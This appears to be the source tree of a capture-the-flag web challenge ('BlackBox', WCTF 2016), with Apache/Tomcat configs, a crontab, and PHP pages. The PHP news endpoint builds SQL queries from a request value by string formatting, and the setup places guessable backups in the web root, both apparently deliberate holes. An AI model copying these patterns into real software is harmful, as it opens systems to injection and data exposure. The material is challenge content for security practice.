--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/mods-enabled/php7.0.conf:
--------------------------------------------------------------------------------
1 |
2 | SetHandler application/x-httpd-php
3 |
4 |
5 | SetHandler application/x-httpd-php-source
6 | # Deny access to raw php sources by default
7 | # To re-enable it's recommended to enable access to the files
8 | # only in specific virtual host or directory
9 | Require all denied
10 |
11 | # Deny access to files without filename (e.g. '.php')
12 |
13 | Require all denied
14 |
15 |
16 | # Running PHP scripts in user directories is disabled by default
17 | #
18 | # To re-enable PHP in user directories comment the following lines
19 | # (from to .) Do NOT set it to On as it
20 | # prevents .htaccess files from disabling it.
21 |
22 |
23 | php_admin_flag engine Off
24 |
25 |
26 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/mods-enabled/php7.0.load:
--------------------------------------------------------------------------------
1 | # Conflicts: php5
2 | LoadModule php7_module /usr/lib/apache2/modules/libphp7.0.so
3 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/ports.conf:
--------------------------------------------------------------------------------
1 | # If you just change the port or add more ports here, you will likely also
2 | # have to change the VirtualHost statement in
3 | # /etc/apache2/sites-enabled/000-default.conf
4 |
5 | Listen 80
6 |
7 |
8 | Listen 443
9 |
10 |
11 |
12 | Listen 443
13 |
14 |
15 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
16 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/sites-enabled/000-default.conf:
--------------------------------------------------------------------------------
1 |
2 |
3 | ServerAdmin webmaster@localhost
4 | DocumentRoot /www
5 |
6 |
7 | ErrorLog ${APACHE_LOG_DIR}/error.log
8 | CustomLog ${APACHE_LOG_DIR}/access.log combined
9 |
10 |
11 | Require all granted
12 |
13 |
14 | JkMount /login/* ajp13_worker
15 | JkMount /login ajp13_worker
16 |
17 |
18 |
19 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
20 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/etc/crontab:
--------------------------------------------------------------------------------
1 | # /etc/crontab: system-wide crontab
2 | # Unlike any other crontab you don't have to run the `crontab'
3 | # command to install the new version when you edit this file
4 | # and files in /etc/cron.d. These files also have username fields,
5 | # that none of the other crontabs do.
6 |
7 | SHELL=/bin/sh
8 | PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
9 |
10 | # m h dom mon dow user command
11 | 17 * * * * root cd / && run-parts --report /etc/cron.hourly
12 | 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
13 | 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
14 | 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
15 |
16 |
17 | */10 * * * * root find /www/write_shell_here_\=P -type f -delete
18 | */5 * * * * root rm /www/*.tgz; cp /root/www_backup_for_poc_ctf_and_you_cant_guess_it.tgz /www/www_backup_for_poc_ctf_and_you_cant_guess_it_$(openssl rand -hex 8).tgz
19 | #
20 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/h2/bin/h2-1.4.191.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/h2/bin/h2-1.4.191.jar
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/h2/bin/h2-shell.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | if [ -z "$H2_HOME" ]; then
4 | echo "H2_HOME is not set"
5 | echo "Set H2_HOME environment variable: export H2_HOME=/path/to/h2"
6 | exit 1
7 | fi
8 |
9 | URL=$1
10 | USER=$2
11 | PASSWORD=$3
12 |
13 | if [ -z "$URL" ]; then
14 | echo "URL is not set"
15 | echo "Usage: h2-shell.sh URL USER PASSWORD"
16 | exit 1
17 | fi
18 |
19 | if [ -z "$USER" ]; then
20 | echo "USER is not set"
21 | echo "Usage: h2-shell.sh URL USER PASSWORD"
22 | exit 1
23 | fi
24 |
25 | if [ -z "$PASSWORD" ]; then
26 | echo "PASSWORD is not set"
27 | echo "Usage: h2-shell.sh URL USER PASSWORD"
28 | exit 1
29 | fi
30 |
31 | java -cp $H2_HOME/bin/h2*.jar org.h2.tools.Shell -url $URL -user $USER -password $PASSWORD
32 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/h2/bin/h2.pid:
--------------------------------------------------------------------------------
1 | 26109
2 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/h2/db/news.mv.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/h2/db/news.mv.db
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/login.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/login.war
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/Catalina/localhost/manager.xml:
--------------------------------------------------------------------------------
1 |
2 |
18 |
20 |
21 |
22 |
23 | WEB-INF/web.xml
24 | ${catalina.base}/conf/web.xml
25 |
26 |
27 |
30 |
31 |
33 |
36 |
37 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/logging.properties:
--------------------------------------------------------------------------------
1 | # Licensed to the Apache Software Foundation (ASF) under one or more
2 | # contributor license agreements. See the NOTICE file distributed with
3 | # this work for additional information regarding copyright ownership.
4 | # The ASF licenses this file to You under the Apache License, Version 2.0
5 | # (the "License"); you may not use this file except in compliance with
6 | # the License. You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License.
15 |
16 | handlers = 1catalina.org.apache.juli.FileHandler, 2localhost.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
17 |
18 | .handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
19 |
20 | ############################################################
21 | # Handler specific properties.
22 | # Describes specific configuration info for Handlers.
23 | ############################################################
24 |
25 | 1catalina.org.apache.juli.FileHandler.level = FINE
26 | 1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
27 | 1catalina.org.apache.juli.FileHandler.prefix = catalina.
28 |
29 | 2localhost.org.apache.juli.FileHandler.level = FINE
30 | 2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
31 | 2localhost.org.apache.juli.FileHandler.prefix = localhost.
32 |
33 | java.util.logging.ConsoleHandler.level = FINE
34 | java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
35 |
36 | ############################################################
37 | # Facility specific properties.
38 | # Provides extra control for each logger.
39 | ############################################################
40 |
41 | org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
42 | org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 2localhost.org.apache.juli.FileHandler
43 |
44 | # For example, set the com.xyz.foo logger to only log SEVERE
45 | # messages:
46 | #org.apache.catalina.startup.ContextConfig.level = FINE
47 | #org.apache.catalina.startup.HostConfig.level = FINE
48 | #org.apache.catalina.session.ManagerBase.level = FINE
49 | #org.apache.catalina.core.AprLifecycleListener.level=FINE
50 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/policy.d/01system.policy:
--------------------------------------------------------------------------------
1 | // Licensed to the Apache Software Foundation (ASF) under one or more
2 | // contributor license agreements. See the NOTICE file distributed with
3 | // this work for additional information regarding copyright ownership.
4 | // The ASF licenses this file to You under the Apache License, Version 2.0
5 | // (the "License"); you may not use this file except in compliance with
6 | // the License. You may obtain a copy of the License at
7 | //
8 | // http://www.apache.org/licenses/LICENSE-2.0
9 | //
10 | // Unless required by applicable law or agreed to in writing, software
11 | // distributed under the License is distributed on an "AS IS" BASIS,
12 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | // See the License for the specific language governing permissions and
14 | // limitations under the License.
15 |
16 | // ============================================================================
17 | // catalina.corepolicy - Security Policy Permissions for Tomcat 8
18 | //
19 | // This file contains a default set of security policies to be enforced (by the
20 | // JVM) when Catalina is executed with the "-security" option. In addition
21 | // to the permissions granted here, the following additional permissions are
22 | // granted to the codebase specific to each web application:
23 | //
24 | // * Read access to the document root directory
25 | //
26 | // $Id: catalina.policy 609294 2008-01-06 11:43:46Z markt $
27 | // ============================================================================
28 |
29 |
30 | // ========== SYSTEM CODE PERMISSIONS =========================================
31 |
32 |
33 | // These permissions apply to javac
34 | grant codeBase "file:${java.home}/lib/-" {
35 | permission java.security.AllPermission;
36 | };
37 |
38 | // These permissions apply to all shared system extensions
39 | grant codeBase "file:${java.home}/jre/lib/ext/-" {
40 | permission java.security.AllPermission;
41 | };
42 |
43 | // These permissions apply to javac when ${java.home] points at $JAVA_HOME/jre
44 | grant codeBase "file:${java.home}/../lib/-" {
45 | permission java.security.AllPermission;
46 | };
47 |
48 | // These permissions apply to all shared system extensions when
49 | // ${java.home} points at $JAVA_HOME/jre
50 | grant codeBase "file:${java.home}/lib/ext/-" {
51 | permission java.security.AllPermission;
52 | };
53 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/policy.d/02debian.policy:
--------------------------------------------------------------------------------
1 | // These permissions apply to all JARs from Debian packages
2 | grant codeBase "file:/usr/share/java/-" {
3 | permission java.security.AllPermission;
4 | };
5 | grant codeBase "file:/usr/share/maven-repo/-" {
6 | permission java.security.AllPermission;
7 | };
8 | grant codeBase "file:/usr/share/ant/lib/-" {
9 | permission java.security.AllPermission;
10 | };
11 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/policy.d/03catalina.policy:
--------------------------------------------------------------------------------
1 | // ========== CATALINA CODE PERMISSIONS =======================================
2 |
3 |
4 | // These permissions apply to the logging API
5 | grant codeBase "file:${catalina.home}/bin/tomcat-juli.jar" {
6 | permission java.util.PropertyPermission "java.util.logging.config.class", "read";
7 | permission java.util.PropertyPermission "java.util.logging.config.file", "read";
8 | permission java.lang.RuntimePermission "shutdownHooks";
9 | permission java.io.FilePermission "${catalina.base}${file.separator}conf${file.separator}logging.properties", "read";
10 | permission java.util.PropertyPermission "catalina.base", "read";
11 | permission java.util.logging.LoggingPermission "control";
12 | permission java.io.FilePermission "${catalina.base}${file.separator}logs", "read, write";
13 | permission java.io.FilePermission "${catalina.base}${file.separator}logs${file.separator}*", "read, write";
14 | permission java.lang.RuntimePermission "getClassLoader";
15 | permission java.lang.RuntimePermission "setContextClassLoader";
16 | // To enable per context logging configuration, permit read access to the appropriate file.
17 | // Be sure that the logging configuration is secure before enabling such access
18 | // eg for the examples web application:
19 | // permission java.io.FilePermission "${catalina.base}${file.separator}webapps${file.separator}examples${file.separator}WEB-INF${file.separator}classes${file.separator}logging.properties", "read";
20 | };
21 |
22 | // These permissions apply to the server startup code
23 | grant codeBase "file:${catalina.home}/bin/bootstrap.jar" {
24 | permission java.security.AllPermission;
25 | };
26 |
27 | // These permissions apply to the servlet API classes
28 | // and those that are shared across all class loaders
29 | // located in the "lib" directory
30 | grant codeBase "file:${catalina.home}/lib/-" {
31 | permission java.security.AllPermission;
32 | };
33 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/policy.d/50local.policy:
--------------------------------------------------------------------------------
1 | // You can assign additional permissions to particular web applications by
2 | // adding additional "grant" entries here, based on the code base for that
3 | // application, /WEB-INF/classes/, or /WEB-INF/lib/ jar files.
4 | //
5 | // Different permissions can be granted to JSP pages, classes loaded from
6 | // the /WEB-INF/classes/ directory, all jar files in the /WEB-INF/lib/
7 | // directory, or even to individual jar files in the /WEB-INF/lib/ directory.
8 | //
9 | // For instance, assume that the standard "examples" application
10 | // included a JDBC driver that needed to establish a network connection to the
11 | // corresponding database and used the scrape taglib to get the weather from
12 | // the NOAA web server. You might create a "grant" entries like this:
13 | //
14 | // The permissions granted to the context root directory apply to JSP pages.
15 | // grant codeBase "file:${catalina.base}/webapps/examples/-" {
16 | // permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect";
17 | // permission java.net.SocketPermission "*.noaa.gov:80", "connect";
18 | // };
19 | //
20 | // The permissions granted to the context WEB-INF/classes directory
21 | // grant codeBase "file:${catalina.base}/webapps/examples/WEB-INF/classes/-" {
22 | // };
23 | //
24 | // The permission granted to your JDBC driver
25 | // grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar!/-" {
26 | // permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect";
27 | // };
28 | // The permission granted to the scrape taglib
29 | // grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/scrape.jar!/-" {
30 | // permission java.net.SocketPermission "*.noaa.gov:80", "connect";
31 | // };
32 |
33 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/conf/tomcat-users.xml:
--------------------------------------------------------------------------------
1 |
2 |
18 |
22 |
23 |
24 |
34 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/lib/commons-codec-1.10.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/tomcat8/lib/commons-codec-1.10.jar
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/tomcat8/webapps/ROOT/META-INF/context.xml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/waf.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/waf.war
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Black Box
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
39 |
40 |
41 |
42 | Black Box Testing
43 | This website is full of old tricks :( If you love web hacking and need more and more incredible web tricks, join HITCON CTF 2016 this year!
44 |
45 |
46 | HITCON CTF »
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/news.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Black Box
9 |
10 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
58 |
59 |
60 |
61 | News
62 | What happened today?
63 |
64 |
65 |
66 |
67 | #
68 | TITLE
69 | HITS
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/news/index.php:
--------------------------------------------------------------------------------
1 | msg == "legal"){
21 | $res = pg_query(sprintf("SELECT * FROM news WHERE id='%s'", $id));
22 | $result = pg_fetch_object($res);
23 |
24 | @pg_query(sprintf("UPDATE news SET hits=hits+1 WHERE id='%s'", $id));
25 |
26 | if ($result) {
27 | echo json_encode($result);
28 | } else {
29 | echo json_encode(array("msg"=>"nothing happened"));
30 | }
31 | } else {
32 | echo json_encode($data);
33 | }
34 | } else {
35 | $res = pg_query("SELECT * FROM news");
36 |
37 | $result = array();
38 | while ($data = pg_fetch_object($res)){
39 | $result[] = $data;
40 | }
41 |
42 | echo json_encode($result);
43 | }
44 |
45 |
46 |
47 | // $r = pg_query($_POST[sql]) or die( pg_last_error() );
48 | // print_r( pg_fetch_object($r) );
49 | // CREATE TABLE news( id SERIAL PRIMARY KEY, title text NOT NULL, content text NOT NULL, hits int NOT NULL );
50 | // INSERT INTO news(title, content, hits) values('Hello Wolrd:)', 'This is a example news content.',1)
51 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/show.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Black Box
9 |
10 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/waf/index.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/www/www_backup_for_poc_ctf_and_you_cant_guess_it_59cffc9547c828b5.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/www/www_backup_for_poc_ctf_and_you_cant_guess_it_59cffc9547c828b5.tgz
--------------------------------------------------------------------------------